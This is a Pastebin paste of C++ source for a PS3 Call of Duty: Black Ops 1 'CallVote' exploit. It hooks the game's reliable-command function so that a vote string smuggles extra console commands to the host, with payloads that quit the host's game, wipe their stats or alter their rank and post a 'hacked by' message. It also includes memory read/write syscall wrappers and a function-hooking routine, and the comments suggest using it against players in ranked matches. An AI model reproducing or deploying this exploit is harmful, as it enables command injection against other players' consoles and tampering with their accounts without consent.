API tools faq
paste
Advertisement
Jo-Milk

Bo1 Non-Host Infection A.K.A. CallVote Exploit

Jo-Milk
Sep 26th, 2018
1,228
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 4.61 KB | None | 0 0
raw download clone embed print report
  1. /*Bo1 Nonhost Infection A.K.A. CallVote Exploit
  2. Credits:
  3. http://old.zenhax.com/quake3-engine-callvote-bug-t686.html
  4.  
  5. Luigi for documenting Quake 3 callvote Exploite
  6. 01cedricv2 for showing Quake documentation to Jo-Milk
  7. and Jo-Milk for porting to PS3
  8.  
  9. This can be ported on Bo2 [Tested] and Other cods
  10. This infects the host once Vote passes to do so
  11. you need to join your friend in a private match
  12. He'll need to be the host:
  13. 1st way is:
  14.  you tell him to go spectator and you spawn in and use cbuf_AddText
  15. 2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host
  16.  
  17. this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
  18. */
  19.  
  20. #define TOC 0x0072DCE8//1.13
  21. int var = 1;//change this value to change the infection type
  22.  
  23. int cbuf[] = { 0x00399CC8, TOC };
  24. void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;
  25.  
  26. void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
  27.     __nop();
  28.     __nop();
  29.     __nop();
  30.     __nop();
  31.     __nop();
  32.     __nop();
  33.     __nop();
  34. }
  35.  
  36. void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
  37. {
  38.     if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//if dont work try pszBuffer
  39.     {
  40.         switch (var)
  41.         {
  42.         case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//RANK 50 not fully done
  43.         case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//kick host to XMB
  44.         case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//Derank
  45.         default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;
  46.         }
  47.  
  48.     }
  49.     else
  50.     {
  51.         MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
  52.     }
  53. }
  54. /*basically we replaced ';' by '\n' in the hook making the host execute the whole line of dvars instead of one
  55. but in cbuf_AddText you want ';' to avoid the game from executing the line of dvars on yourself*/
  56.  
  57. /*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
  58. cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");
  59.  
  60. /*--------------------------------------------------Extra----------------------------------------------------------------------*/
  61. //read write syscalls
  62.  int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
  63. {
  64.     system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
  65.     return_to_user_prog(int32_t);
  66. }
  67.  
  68. template<typename T>
  69. int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
  70. {
  71.     return sys_dbg_read_process_memory(address, &data, size);
  72. }
  73.  
  74. int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
  75. {
  76.     system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
  77.     return_to_user_prog(int32_t);
  78. }
  79.  
  80. template<typename T>
  81. int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
  82. {
  83.     return sys_dbg_write_process_memory(address, &value, size);
  84. }
  85.  
  86. void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
  87. {
  88.     uint32_t normalFunctionStub[8], hookFunctionStub[4];
  89.     sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
  90.     normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);
  91.     normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);
  92.     normalFunctionStub[6] = 0x7D6903A6;
  93.     normalFunctionStub[7] = 0x4E800420;
  94.     sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);
  95.     hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);
  96.     hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);
  97.     hookFunctionStub[2] = 0x7D6903A6;
  98.     hookFunctionStub[3] = 0x4E800420
  99.     sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
  100. }
  101.  
  102. HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!